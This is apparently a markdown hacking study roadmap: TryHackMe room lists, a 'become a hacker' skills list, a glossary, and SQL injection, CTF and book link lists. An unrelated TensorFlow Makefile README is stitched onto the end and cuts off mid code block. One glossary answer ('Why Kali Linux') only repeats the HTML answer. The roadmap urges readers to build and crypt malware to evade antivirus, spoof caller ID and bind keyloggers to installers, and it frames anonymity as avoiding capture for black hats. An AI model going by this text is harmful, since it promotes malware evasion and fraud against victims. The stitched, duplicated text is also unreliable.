๐Ÿฆš # Level 1 - Intro - [ ] OpenVPN https://tryhackme.com/room/openvpn - [ ] Welcome https://tryhackme.com/jr/welcome - [ ] Intro to Researching https://tryhackme.com/room/introtoresearch - [ ] Learn Linux https://tryhackme.com/room/zthlinux - [ ] Crash Course Pentesting https://tryhackme.com/room/ ccpentesting - [ ] Introductory CTFs to get your feet wet - [ ] Google Dorking https://tryhackme.com/room/googledorking - [ ] OHsint https://tryhackme.com/room/ohsint - [ ] Shodan.io https://tryhackme.com/room/shodan ๐Ÿฆš # Level 2 - Tooling - [ ] Tmux https://tryhackme.com/room/rptmux - [ ] Nmap https://tryhackme.com/room/rpnmap - [ ] Web Scanning https://tryhackme.com/room/rpwebscanning - [ ] Sublist3r https://tryhackme.com/room/rpsublist3r - [ ] Metasploit https://tryhackme.com/room/rpmetasploit - [ ] Hydra https://tryhackme.com/room/hydra - [ ] Linux Privesc https://tryhackme.com/room/linuxprivesc - [ ] Web Scanning https://tryhackme.com/room/rpwebscanning More introductory CTFs - [ ] Vulnversity - https://tryhackme.com/room/vulnversity - [ ] Blue - https://tryhackme.com/room/blue - [ ] Simple CTF https://tryhackme.com/room/easyctf - [ ] Bounty Hacker https://tryhackme.com/room/cowboyhacker ๐Ÿฆš # Level 3 - Crypto & Hashes with CTF practice - [ ] Crack the hash https://tryhackme.com/room/crackthehash - [ ] Agent Sudo https://tryhackme.com/room/agentsudoctf - [ ] The Cod Caper https://tryhackme.com/room/thecodcaper - [ ] Ice https://tryhackme.com/room/ice - [ ] Lazy Admin https://tryhackme.com/room/lazyadmin - [ ] Basic Pentesting https://tryhackme.com/room/basicpentestingjt ๐Ÿฆš # Level 4 - Web - [ ] OWASP top 10 https://tryhackme.com/room/owasptop10 - [ ] Inclusion https://tryhackme.com/room/inclusion - [ ] Injection https://tryhackme.com/room/injection - [ ] Vulnversity https://tryhackme.com/room/vulnversity - [ ] Basic Pentesting https://tryhackme.com/room/basicpentestingjt - [ ] Juiceshop https://tryhackme.com/room/owaspjuiceshop - [ ] Ignite https://tryhackme.com/room/ignite - [ ] Overpass https://tryhackme.com/room/overpass - [ ] Year of the Rabbit https://tryhackme.com/room/yearoftherabbit - [ ] DevelPy https://tryhackme.com/room/bsidesgtdevelpy - [ ] Jack of all trades https://tryhackme.com/room/jackofalltrades - [ ] Bolt https://tryhackme.com/room/bolt ๐Ÿฆš # Level 5 - Reverse Engineering - [ ] Intro to x86 64 https://tryhackme.com/room/introtox8664 - [ ] CC Ghidra https://tryhackme.com/room/ccghidra - [ ] CC Radare2 https://tryhackme.com/room/ccradare2 - [ ] CC Steganography https://tryhackme.com/room/ccstego - [ ] Reverse Engineering https://tryhackme.com/room/reverseengineering - [ ] Reversing ELF https://tryhackme.com/room/reverselfiles - [ ] Dumping Router Firmware https://tryhackme.com/room/rfirmware ๐Ÿฆš # Level 6 - PrivEsc - [ ] Sudo Security Bypass https://tryhackme.com/room/sudovulnsbypass - [ ] Sudo Buffer Overflow https://tryhackme.com/room/sudovulnsbof - [ ] Windows Privesc Arena https://tryhackme.com/room/windowsprivescarena - [ ] Linux Privesc Arena https://tryhackme.com/room/linuxprivescarena - [ ] Windows Privesc https://tryhackme.com/room/windows10privesc - [ ] Blaster https://tryhackme.com/room/blaster - [ ] Ignite https://tryhackme.com/room/ignite - [ ] Kenobi https://tryhackme.com/room/kenobi - [ ] Capture the flag https://tryhackme.com/room/c4ptur3th3fl4g - [ ] Pickle Rick https://tryhackme.com/room/picklerick ๐Ÿฆš # Level 7 - CTF practice - [ ] Post Exploitation Basics https://tryhackme.com/room/postexploit - [ ] Smag Grotto https://tryhackme.com/room/smaggrotto - [ ] Inclusion https://tryhackme.com/room/inclusion - [ ] Dogcat https://tryhackme.com/room/dogcat - [ ] LFI basics https://tryhackme.com/room/lfibasics - [ ] Buffer Overflow Prep https://tryhackme.com/room/bufferoverflowprep - [ ] Overpass https://tryhackme.com/room/overpass - [ ] Break out the cage https://tryhackme.com/room/breakoutthecage1 - [ ] Lian Yu https://tryhackme.com/room/lianyu --- --- --- # Everything You Need to Know to Become a HACKER --- Many people are asking me this. In this section I am regrouping what ethical, black hat and grey hat hackers think are the essential skills and knowledge any pen tester should know. At the top you will find all the essential tools and knowledge one must learn to become efficient and skilled at penetration testing, and at the bottom, the second part explaining what each of these things are. ## PART I: THE ESSENTIALS Some of these tutorial are simple or PoC but I strongly suggest you find books on each of these subjects before you say you understand how this works. 1. Start by learning how TCP/UDP works (networking): `TCP and UDP` You must know the fundamentals of HTTP and how Structured Query Language databases work : `HTTP fundamentals and SQL` 2. Learn HTML, install a Linux OS preferably KALI Linux on a virtualization program like VirtualBox (free) or VMWARE (paid). `Learn HTML` `Download Kali on VirtualBox/VirtualBox Workstation Pro` 3. Learn basic Debian commands to feel comfortable using KALI and download the KALI hand-book 4. Learn how to be anonymous using `Tor, ProxyChains, Whonix and VPN's` that don't keep logs (``Mullvad VPN`), MAC spoofing, DNS spoofing. `Tor || ProxyChains || Whonix || Mac Spoofing || DNS Spoofing` 5. Learn to use `Burp Suite`, `Nmap`, and once you really understand SQL try `SQLMap`. `Nmap || BurpSuite || SQLMap` 6. Learn your way around Metasploit(=)Armitage but before that understand the different OS vulnerabilities by searching their CVE. `Metasploit Framework || CVE Website` 7. Understand WEP/WPA/WPS, watch out for KRACK which will be released soon and we might learn how to crack WPA2. `WPA-WEP info || KRACK` Once you have understood these find out about the `air-ng suite, aircrack-ng, aireplay-ng` and others. Air-ng suite - How to crack Wireless Networks 8. Learn how to use tamper data, sniff networks and to accomplish MITM attacks. `Tamper Data || Sniff with Wireshark || MITM` 9. Learn about wireless adapters and their different modes. `Different modes` 10. Learn how to "automate" vulnerability scanning with Nessus. `Nessus Guide` 11. Learn about XSS, RFI, LFI. Don't learn how to DDoS (joking). `XSS-LFI-RFI Tutorial` 12. Understand the ins and out of the OSI model. `Layers of OSI Model` 13. Learn how to create a backdoor, what shells are and the definition of a 0-day. `Create a backdoor` 14. Brute-forcing and Dictionary attacks. `Crack passwords with Hydra` Hash cracking: `Crack with John` 15. Learn how to use google dorks (google hacking). `Google Hacking Database` 16. Learn what are DNS, how to do `whois` lookups. What is a DNS ? 17. Learn the most important port numbers. `Port number list` 18. How to spoof a phone number. `Caller ID Spoofing` Research different scripting languages, check Rubber Ducky and these kind of hardware tools everybody talks about. Rubber Ducky 19. Learn how to create java-drive-by and browser based infection methods. `Java Drive By [outdated]` 20. Understand how AV's work and how to create malwares and how to crypt them. `Basic AV detection methods || Create a Crypter` 21. Social Engineering or how to lie. I won't discuss this here but here is a book on persuasion: `Robert Cialdini Influence and Manipulation` Once you have learned all that maybe you can start learning the advanced stuff. Of course, I hope you will become a white-hat and help people with their security instead of breaching it. ## PART II: GLOSSARY TCP/IP (Networking): Computers themselves speak to each other across a network through the use of packets. In essence the base unit of communications in the world of computer networks is the packet. Packets themselves are most commonly built using the TCP/IP stack, which is part of the computer's operating system. Each operating system has some unique values coded into its implementation of the TCP/IP stack. This is how OS fingerprinting works, by studying these unique values such as MSS and MTU among others. It has been said before that to recognize the abnormal you must first understand what is normal. This is why we need to understand what a normal TCP/IP packet looks like and how TCP/IP itself sets up communications between computers. Here some answer of some common questions related to `Ethical Hacking` is listed: ### `Why is HTML important in pen-testing?` First because everything page you see on the web are displayed to some extent using HTML. It is the minimum to know the most basic language which carries the most content on internet. Also HTML injection is an attack that is similar to Cross-site Scripting (XSS). While in the XSS vulnerability the attacker can inject and execute JavaScript code, the HTML injection attack only allows the injection of certain HTML tags. When an application does not properly handle user supplied data, an attacker can supply valid HTML code, typically via a parameter value, and inject their own content into the page. This attack is typically used in conjunction with some form of social engineering, as the attack is exploiting a code-based vulnerability and a user's trust. ### `Why Kali Linux and why in a Virtual Machine(VM)?` First because everything page you see on the web are displayed to some extent using HTML. It is the minimum to know the most basic language which carries the most content on internet. Also HTML injection is an attack that is similar to Cross-site Scripting (XSS). While in the XSS vulnerability the attacker can inject and execute JavaScript code, the HTML injection attack only allows the injection of certain HTML tags. When an application does not properly handle user supplied data, an attacker can supply valid HTML code, typically via a parameter value, and inject their own content into the page. This attack is typically used in conjunction with some form of social engineering, as the attack is exploiting a code-based vulnerability and a user's trust. ### `Why learn Debian commands?` Don't need spoilers for that one, in my opinion it is important to know your way around the system you use and learn the basic terminal commands that are packed within. ### `Why use Tor, ProxyChains, Whonix or a VPN?` During the penetration testing or vulnerability assessment or hacking, staying anonymous is one of the important factor. If you are a black hat, you also don't want to get caught. Without it, the internet connection will reveal your identity. ProxyChains is Proxifier for Linux system. It allows TCP and DNS tunneling through proxies. It supports HTTP, SOCKS4 and SOCKS5 proxy servers. It uses multiple proxies at a time, so it is called Proxy Chaining. In the tutorial you will be taught to use ProxyChains through the Tor network. Whonix is also a very good way to stay anonymous and makes use of the Tor network with its own gateway. MAC Spoofing allows you to change your MAC address which is your computer's ID. Your MAC address points to your PC's brand and can lead to you when deep searching. ### `Why use nmap, Burp-Suite and SQLMAP?` Burp-Suite is a Java based Web Penetration Testing framework. It has become an industry standard suite of tools used by information security professionals to identify vulnerabilities and verify attack vectors for web-based applications. In its simplest form, Burp-Suite can be classified as an Interception Proxy. A penetration tester configures their Internet browser to route traffic through the proxy which then acts as a sort of Man In The Middle by capturing and analyzing each request and response to and from the target web application. Individual HTTP requests can be paused, manipulated and replayed back to the web server for targeted analysis of parameter specific injection points. Injection points can be specified for manual as well as automated fuzzing attacks to discover potentially unintended application behaviors, crashes and error messages. Nmap ("Network Mapper") is a free and open source (license) utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X. In addition to the classic command-line Nmap executable, the Nmap suite includes an advanced GUI and results viewer (Zenmap), a flexible data transfer, redirection, and debugging tool (Ncat), a utility for comparing scan results (Ndiff), and a packet generation and response analysis tool (Nping). sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. ### `Why learn to use the Metasploit Framework?` Metasploit Framework is a open source penetration tool used for developing and executing exploit code against a remote target machine it, Metasploit framework has the worldโ€™s largest database of public, tested exploits. In simple words, Metasploit can be used to test the Vulnerability of computer systems in order to protect them and on the other hand it can also be used to break into remote systems. It is the most renown framework used to exploit systems. ### `Why understand WEP/WPA?` If you want to become a professional pen-tester you will have to learn about WEP/WPA encryption because the whole wireless ecosystem resolves around these encryption, understand these will give you greater power when cracking wireless networks. ### `Why master the air-ng suite (use for wireless hacking)?` Most if not every Wi-FI cracking methods involve using aircrack-ng. Learning how to use these tools will allow you to crack most wireless network. ### `Why learn how to perform MITM (man in the middle) attacks, sniff networks and tamper data?` In a sense, a man-in-the-middle attack (MITM) is like eavesdropping. Data is sent from point A (computer) to point B (server/website), and an attacker can get in-between these transmissions. They then set up tools programmed to โ€œlisten inโ€ on transmissions, intercept data that is specifically targeted as valuable, and capture the data. Sometimes this data can be modified in the process of transmission to try to trick the end user to divulge sensitive information, such as log in credentials. Once the user has fallen for the bait, the data is collected from the target, and the original data is then forwarded to the intended destination unaltered. Sniffing and snooping. They refer to listening to a conversation. For example, if you login to a website that uses no encryption, your username and password can be sniffed off the network by someone who can capture the network traffic between you and the web site. Spoofing refers to actively introducing network traffic pretending to be someone else. For example, spoofing is sending a command to computer A pretending to be computer B. It is typically used in a scenario where you generate network packets that say they originated by computer B while they really originated by computer C. Spoofing in an email context means sending an email pretending to be someone else. Tamper Data is an add-on for Firefox that lets you view and modify HTTP requests before they are sent. It shows what information the web browser is sending on your behalf, such as cookies and hidden form fields. Use of this plugin can reveal web applications that trust the client not to misbehave. ### `What is Brute-forcing?` A brute-force attack consists of an attacker trying many passwords or passphrases with the hope of eventually guessing correctly. The attacker systematically checks all possible passwords and passphrases until the correct one is found. Alternatively, the attacker can attempt to guess the key which is typically created from the password using a key derivation function. This is known as an exhaustive key search. ### `Why learn XSS, LFI, RFI?` Cross-site Scripting (XSS) refers to client-side code injection attack wherein an attacker can execute malicious scripts (also commonly referred to as a malicious payload) into a legitimate website or web application. XSS is amongst the most rampant of web application vulnerabilities and occurs when a web application makes use of invalidated or unencoded user input within the output it generates. Remote File inclusion (RFI) refers to an inclusion attack wherein an attacker can cause the web application to include a remote file by exploiting a web application that dynamically includes external files or scripts. The consequences of a successful RFI attack include Information Disclosure and Cross-site Scripting (XSS) to Remote Code Execution. Remote File Inclusion (RFI) usually occurs, when an application receives the path to the file that has to be included as an input without properly sanitizing it. This would allow an external URL to be supplied to the include statement. Local File inclusion (LFI), or simply File Inclusion, refers to an inclusion attack through which an attacker can trick the web application in including files on the web server by exploiting functionality that dynamically includes local files or scripts. The consequence of a successful LFI attack includes Directory Traversal and Information Disclosure as well as Remote Code Execution. Typically, Local File Inclusion (LFI) occurs, when an application gets the path to the file that has to be included as an input without treating it as untrusted input. This would allow a local file to be supplied to the include statement. ### `What is a backdoor in Pen-testing?` Attackers can install their own backdoor on a targeted system. Doing so allows them to come and go as they please and gives them remote access to the system. Malware installed on systems for this purpose is often called a remote access Trojan, or a RAT, and can be used to install other malware on the system or exfiltrate data. Would love writing more. Good luck on your journey and remember white hats shine more then black. <h1>Links of Different Topics</h1> <h2>Best SQL injection resources</h2> - MySQL: - [PentestMonkey's mySQL injection cheat sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet) - [Reiners mySQL injection Filter Evasion Cheatsheet](https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/) - MSQQL: - [EvilSQL's Error/Union/Blind MSSQL Cheatsheet](http://evilsql.com/main/page2.php) - [PentestMonkey's MSSQL SQLi injection Cheat Sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet) - ORACLE: - [PentestMonkey's Oracle SQLi Cheatsheet](http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet) - POSTGRESQL: - [PentestMonkey's Postgres SQLi Cheatsheet](http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet) - Others - [Access SQLi Cheatsheet](http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html) - [PentestMonkey's Ingres SQL Injection Cheat Sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/ingres-sql-injection-cheat-sheet) - [Pentestmonkey's DB2 SQL Injection Cheat Sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/db2-sql-injection-cheat-sheet) - [Pentestmonkey's Informix SQL Injection Cheat Sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/informix-sql-injection-cheat-sheet) - [SQLite3 Injection Cheat sheet](https://sites.google.com/site/0x7674/home/sqlite3injectioncheatsheet) - [Ruby on Rails (Active Record) SQL Injection Guide](http://rails-sqli.org/) <h2>CTF</h2> ***Read my [CTF Resources](./CTF Resources/README.md) notes which is a simply managed and updated copy of information from [ctf/resources](https://github.com/ctfs/resources/ "https://github.com/ctfs/resources/") repository*** 1. Practice: 1. [picoCTF](https://picoctf.com "https://picoctf.com") 2. [catb](http://www.catb.org/~esr/faqs/hacker-howto.html "http://www.catb.org/~esr/faqs/hacker-howto.html") 3. [OverTheWire](https://overthewire.org/wargames/ "https://overthewire.org/wargames/") 4. [Microcorruption](https://microcorruption.com/login "https://microcorruption.com/login") 5. [Google CTF](https://capturetheflag.withgoogle.com "https://capturetheflag.withgoogle.com") 6. [Crypto Challenges](https://cryptopals.com "https://cryptopals.com") 7. [CTFs](https://github.com/ctfs "https://github.com/ctfs") 8. [CTFlearn](https://ctflearn.com "https://ctflearn.com") 9. [Attack-Defend Style CTF](http://usscouts.org/games/game_cf.asp "http://usscouts.org/games/game_cf.asp") 10. [HSCTF 7](https://hsctf.com "https://hsctf.com") 11. [0xRick](https://0xrick.github.io "https://0xrick.github.io") 2. Read to Learn: 1. [CTF Field Guide](http://trailofbits.github.io/ctf/ "http://trailofbits.github.io/ctf/") 2. [DEF CON CTF](https://oooverflow.io "https://oooverflow.io") 3. [CTFTime](https://ctftime.org/ctfs "https://ctftime.org/ctfs") 4. [Awesome Guide](https://www.osusec.org/resources/ "https://www.osusec.org/resources/") 5. [Nightmare](https://guyinatuxedo.github.io "https://guyinatuxedo.github.io") 6. [CTF Resources](http://ctfs.github.io/resources/ "http://ctfs.github.io/resources/") 7. [Awesome CTF](https://github.com/apsdehal/awesome-ctf "https://github.com/apsdehal/awesome-ctf") 8. [Hacking Articles (walkthroughs)](https://www.hackingarticles.in/ctf-challenges-walkthrough/ "https://www.hackingarticles.in/ctf-challenges-walkthrough/") 9. [Antifa](https://github.com/AnarchoTechNYC/meta "https://github.com/AnarchoTechNYC/meta") 10. [Competition's Write-ups](https://nsec.io/competition-write-ups/ "https://nsec.io/competition-write-ups/") 11. [Pentesting Wiki](https://www.peerlyst.com/posts/resource-pentesting-wiki-nicole-lamoureux?fbclid=IwAR3ejbPKCOWvCVvP_PrTegfpwC3tn35Jwyx8g2W39c2CSt93TzDtvRo5Qyw "https://www.peerlyst.com/posts/resource-pentesting-wiki-nicole-lamoureux?fbclid=IwAR3ejbPKCOWvCVvP_PrTegfpwC3tn35Jwyx8g2W39c2CSt93TzDtvRo5Qyw") 12. [Practice CTF List](https://captf.com/practice-ctf/?fbclid=IwAR2V2YdeaRsIDwIs2ywCAHD577fyjMLEPz0ff54uOA9vnagZdRXyBJb6CpU "https://captf.com/practice-ctf/?fbclid=IwAR2V2YdeaRsIDwIs2ywCAHD577fyjMLEPz0ff54uOA9vnagZdRXyBJb6CpU") 13. [bugbounty-cheatsheet](https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/books.md "https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/books.md") 14. [Resources](https://www.vulnhub.com/resources/ "https://www.vulnhub.com/resources/") 15. [Hack the Box (HTB) machines walkthrough series](https://resources.infosecinstitute.com/hack-the-box-htb-walkthrough-secnotes/ "https://resources.infosecinstitute.com/hack-the-box-htb-walkthrough-secnotes/") 16. [0xdf](https://0xdf.gitlab.io "https://0xdf.gitlab.io") <h2>CTF Framework</h2> --- 1. https://ctfd.io 2. [Facebookโ€™s CTF framework](https://github.com/facebook/fbctf "https://github.com/facebook/fbctf") 3. [iCTF](https://github.com/ucsb-seclab/ictf-framework "https://github.com/ucsb-seclab/ictf-framework") 4. [Mellivora](https://github.com/Nakiami/mellivora "https://github.com/Nakiami/mellivora") 5. [NightShade](https://github.com/UnrealAkama/NightShade "https://github.com/UnrealAkama/NightShade") 6. [LibreCTF](https://github.com/easyctf/librectf "https://github.com/easyctf/librectf") <h2></br>Hacker101 Syllabus</h2> --- 1. HTTP basics 2. Cookie Security 3. HTML Parsing 4. MIME Sniffing 5. Encoding Sniffing 6. Same-origin 7. Cross-site request forgery (CSRF) 8. Cross-site scripting 1. Reflected 2. Stored 3. DOM 4. Detection, exploitation and Mitigation 9. Authorization bypasses and forced browsing 10. Directory Traversal 11. Command Injection 12. SQL Injection 1. Detection, exploitation and mitigation 2. Exploiting blind SQLi 13. Session Fixation 14. Clickjacking 15. File inclusion and upload vulnerabilities 16. Null termination vulnerabilities 17. Unchecked redirects 18. Secure password storage 19. Crypto crash 1. XOR - Symmetric ciphers - Stream - Block 2. Asymmetric ciphers 3. Hashes 4. MACs 20. Crypto attacks - Stream cipher reuse - ECB block reordering - ECB partial decryption - Padding oracles - Hash length extension 21. Crypto tricks - Detecting ECB - Determining block sizes - Determining controllable data offsets 22. Lightweight Threat Modeling 23. Secure Architecture Review 24. SSRF 25. Source Review Techniques 26. Cookie Tampering Techniques & XML External Entity Attack 27. Burp Suite - Setting up Burp proxy - Introduction to Burp Suite - Intermediate Burp Suite Techniques - Advanced Burp Hacks for Bounty Hunters <h2></br>Random Collected Topics</h2> <h3>Footprinting and Information Gathering</h3> --- 1. From Social Media 2. Web server `whois` 3. Subdomain 4. Reserved IP Location 5. Which platform used for developing 6. Ping to identify server details 7. Collecting Information from Email Header 8. Email Tracking Tools 9. Tracking of a target person 10. Website Cookies history 11. Recover any deleted files. [ PC or Mobile] <h3>PHP and SQL</h3> --- 1. Learn Web Attacking Method 2. SQL Injection 3. Session Hijacking 4. Server Exploit 5. Bypass 6. Shell upload 1. private 2. legal 7. Compromising Session 1. using Sniffing 2. predicting Session Token <h3>System Hacking</h3> --- 1. Password cracking method 1. All possible 2. Default 3. Guessing 2. Keylogger 1. Ardamax 2. Hardware * Binding with real setup file 3. Spyware <h3>Malware</h3> --- 1. Trojan 2. Batch-programming 3. Server shell 4. File extension viruses 5. Backdoors virus <h3>Social Engineering</h3> --- 1. Phishing 2. CSRF and XSS <h3>Denial of Service(DOS)</h3> --- <h3>SQL Injection</h3> --- 1. Blind SQL 2. POST base 3. WAF Bypass 4. Error base <h3>Evading IDS, Firewalls, and Honeypots</h3> --- 1. Remote and Local file inclusion (RFI and LFI) โ€‹ Malicious File Upload โ€‹ This is an important and common attack vector in this type of testing. โ€‹ A file upload functions need a lot of protections to be adequately secure. โ€‹ Attacks: โ€‹ 1. Upload unexpected file format to achieve code exec (swf, html, php, php3, aspx, ++) Web shells or... โ€‹ 2. Execute XSS via same types of files. Images as well! โ€‹ 3. Attack the parser to DOS the site or XSS via storing payloads in metadata or file header โ€‹ 4. Bypass security zones and store malware on target site via file polyglots File upload attacks are a whole presentation. Try this one to get a feel for bypass techniques: โ€‹ 5. content type spoofing โ€‹ 6. extension trickery - [File in the hole! presentaion](https://www.nds.rub.de/media/attachments/files/2012/11/File-in-the-hole.pdf) As referenced file polyglots can be used to store malware on servers! [See @dan_crowley โ€˜s talk](http://goo.gl/pquXC2) [and @angealbertini research:](corkami.com) 2. X-path 3. Cryptography <h3>Scanning Networks Web Server</h3> --- 1. Nmap 2. VEGA 3. Acunetix <h3>Attack</h3> --- 1. Login Page Injection 2. Cross site scripting 3. Bypass it 4. Authentication Bypass 5. Cookie Injection 6. Man-in-the-Middle <h3>Extra</h3> --- 1. HTML and CSS Injection 2. Remote code execution and Directory Traversing 3. Android Keylogger 4. Steganography 5. [HackTheKeyboard](https://github.com/Sumeet-R/HackTheKeyboard?fbclid=IwAR0ZU10Pdbt9r6_8bgcWM6fnUBjFyiuntCyjIDTNxsB5E1k4lTIF3LLQFHU "https://github.com/Sumeet-R/HackTheKeyboard?fbclid=IwAR0ZU10Pdbt9r6_8bgcWM6fnUBjFyiuntCyjIDTNxsB5E1k4lTIF3LLQFHU") <h3>Exam Preparation</h3> ---- 1. [OSCP-Prep](https://github.com/RustyShackleford221/OSCP-Prep "https://github.com/RustyShackleford221/OSCP-Prep") # Book List ***[Alphabetically Ordered]()*** 1. Burp Suite 1. [Burp Suite Cookbook by Sunny Wear](./Burp%20Suite/Burp%20Suite%20Cookbook.pdf) 2. Cryptography 1. [Algorithmic Cryptanalysis by Antoine Joux](./Cryptograpy/Algorithmic%20Cryptanalysis.pdf) 2. [Handbook of Applied Cryptography by Menezes, Oorschot & Vanstone](Handbook%20of%20applied%20cryptography.pdf) 3. Networking 1. [Computer Networking Problems and Solutions by Russ White and Ethan Banks](./Networking/Computer%20Networking%20Problems.pdf) 2. [Computer Networks by Tanenbaum & Wetherall](./Netwoking/Computer%20Networks.pdf) 3. [Guide to Network Programming by Beej](./Networking/Guide%20to%20Network%20Programming.pdf) 4. [Network Scanning Cookbook by Sairam Jetty](./Networking/Network%20Scanning%20Cookbook .pdf) 5. [Networking All in One for Dummies by Doug Lowe](./Networking/Networking%20All%20in%20One%20for%20Dummies.pdf) 6. [Networking Fundamentals by Gordon Davies](./Networking/Networking%20Fundamentals.pdf) 7. [Seven Deadliest Network Attacks by Prowell, Borkin & Kraus](./Networking/Seven%20Deadliest%20%Network%20Attacks.pdf) 8. [SSH The Secure Shell - The Definitive Guide by Silverman & Barrett](SSH%20The%20Secure%20Shell%20-%20The%20Definitive%20Guide.pdf) 9. [The Only Ip Book You Will Ever Need Unraveling The Mysteries Of Ipv4 Ipv6 by Diaz](./Networking/The%20Only%20Ip%20Book%20You%20Will%20Ever%20Need%20Unraveling%20The%20Mysteries%20Of%20Ipv4%20Ipv6.pdf) 4. Nmap 1. [Mastering Nmap Scripting Engine by Paulino Calderon Pale](./Nmap%20Books/Mastering%20Nmap%20Scripting%20Engine.pdf) 2. [Nmap - Network Exploration and Security Auditing Cookbook by Paulino Calderon](./Nmap%20Books/Nmap%20-%20Network%20Exploration%20and%20Security%20Auditing%20Cookbook.epub) 3. [Nmap Essentials by David Shaw](./Nmap%20Books/Nmap%20Essentials.epub) 4. [Nmap in the Enterprise: Your Guide to Network Scanning by Angela Orebaugh, Becky Pinkard](./Nmap%20Books/Nmap%20in%20the%20Enterprise%20Your%20Guide%20to%20Network%20Scanning.pdf) 5. [Nmap7 - From Beginner to Pro by Nicholas Brown](./Nmap%20Books/Nmap7%20-%20From%20Beginner%20to%20Pro.epub) 6. [Quick Start Guide to Penetration Testing With NMAP, OpenVAS and Metasploit](./Nmap%20Books/Quick%20Start%20Guide%20to%20Penetration%20Testing%20With%20NMAP,%20OpenVAS%20and%20Metasploit.epub) 5. Termux 1. [Termux Tutorials by Techncyber](./Termux/Termux%20Tutorials%20by%20Techncyber.pdf)
### TensorFlow Makefile The recommended way to build TensorFlow from source is using the Bazel open-source build system. Sometimes this isn't possible. For example, if you are building for iOS, you currently need to use the Makefile. - The build system may not have the RAM or processing power to support Bazel. - Bazel or its dependencies may not be available. - You may want to cross-compile for an unsupported target system. This experimental project supplies a Makefile automatically derived from the dependencies listed in the Bazel project that can be used with GNU's make tool. With it, you can compile the core C++ runtime into a static library. This static library will not contain: - Python or other language bindings - GPU support You can target: - iOS - OS X (macOS) - Android - Raspberry-PI You will compile tensorflow and protobuf libraries that you can link into other applications. You will also compile the [benchmark](../../tools/benchmark/) application that will let you check your application. ## Before you start (all platforms) First, clone this TensorFlow repository. You will need to download all dependencies as well. We have provided a script that does so, to be run (as with all commands) **at the root of the repository**: ```bash tensorflow/contrib/makefile/download_dependencies.sh ``` You should only need to do this step once. It downloads the required libraries like Eigen in the `tensorflow/contrib/makefile/downloads/` folder. You should download the example graph from [https://storage.googleapis.com/download.tensorflow.org/models/inception5h.zip](https://storage.googleapis.com/download.tensorflow.org/models/inception5h.zip). ## Building on Linux _Note: This has only been tested on Ubuntu._ As a first step, you need to make sure the required packages are installed: ```bash sudo apt-get install autoconf automake libtool curl make g++ unzip zlib1g-dev \ git python ``` You should then be able to run the `build_all_linux.sh` script to compile: ```bash tensorflow/contrib/makefile/build_all_linux.sh ``` This should compile a static library in `tensorflow/contrib/makefile/gen/lib/libtensorflow-core.a`, and create an example executable at `tensorflow/contrib/makefile/gen/bin/benchmark`. Get the graph file, if you have not already: ```bash mkdir -p ~/graphs curl -o ~/graphs/inception.zip \ https://storage.googleapis.com/download.tensorflow.org/models/inception5h.zip \ && unzip ~/graphs/inception.zip -d ~/graphs/inception ``` To run the executable, use: ```bash tensorflow/contrib/makefile/gen/bin/benchmark \ --graph=$HOME/graphs/inception/tensorflow_inception_graph.pb ``` ## Android First, you will need to download and unzip the [Native Development Kit (NDK)](https://developer.android.com/ndk/). You will not need to install the standalone toolchain, however. Assign your NDK location to $NDK_ROOT: ```bash export NDK_ROOT=/absolute/path/to/NDK/android-ndk-rxxx/ ``` Download the graph if you haven't already: ```bash mkdir -p ~/graphs curl -o ~/graphs/inception.zip \ https://storage.googleapis.com/download.tensorflow.org/models/inception5h.zip \ && unzip ~/graphs/inception.zip -d ~/graphs/inception ``` Then, execute the following: ```bash tensorflow/contrib/makefile/download_dependencies.sh tensorflow/contrib/makefile/compile_android_protobuf.sh -c export HOST_NSYNC_LIB=`tensorflow/contrib/makefile/compile_nsync.sh` export TARGET_NSYNC_LIB=`CC_PREFIX="${CC_PREFIX}" NDK_ROOT="${NDK_ROOT}" \ tensorflow/contrib/makefile/compile_nsync.sh -t android -a armeabi-v7a` make -f tensorflow/contrib/makefile/Makefile TARGET=ANDROID ``` At this point, you will have compiled libraries in `gen/lib/*` and the [benchmark app](../../tools/benchmark) compiled for Android. Run the benchmark by pushing both the benchmark and the graph file to your attached Android device: ```bash adb push ~/graphs/inception/tensorflow_inception_graph.pb /data/local/tmp/ adb push tensorflow/contrib/makefile/gen/bin/benchmark /data/local/tmp/ adb shell '/data/local/tmp/benchmark \ --graph=/data/local/tmp/tensorflow_inception_graph.pb \ --input_layer="input:0" \ --input_layer_shape="1,224,224,3" \ --input_layer_type="float" \ --output_layer="output:0" ' ``` For more details, see the [benchmark documentation](../../tools/benchmark). ## iOS _Note: To use this library in an iOS application, see related instructions in the [iOS examples](../../examples/ios/) directory._ Install XCode 7.3 or more recent. If you have not already, you will need to install the command-line tools using `xcode-select`: ```bash xcode-select --install ``` If this is a new install, you will need to run XCode once to agree to the license before continuing. (You will also need to have [Homebrew](http://brew.sh/) installed.) Then install [automake](https://en.wikipedia.org/wiki/Automake)/[libtool](https://en.wikipedia.org/wiki/GNU_Libtool): ```bash brew install automake brew install libtool ``` Also, download the graph if you haven't already: ```bash mkdir -p ~/graphs curl -o ~/graphs/inception.zip \ https://storage.googleapis.com/download.tensorflow.org/models/inception5h.zip \ && unzip ~/graphs/inception.zip -d ~/graphs/inception ``` ### Building all at once If you just want to get the libraries compiled in a hurry, you can run this from the root of your TensorFlow source folder: ```bash 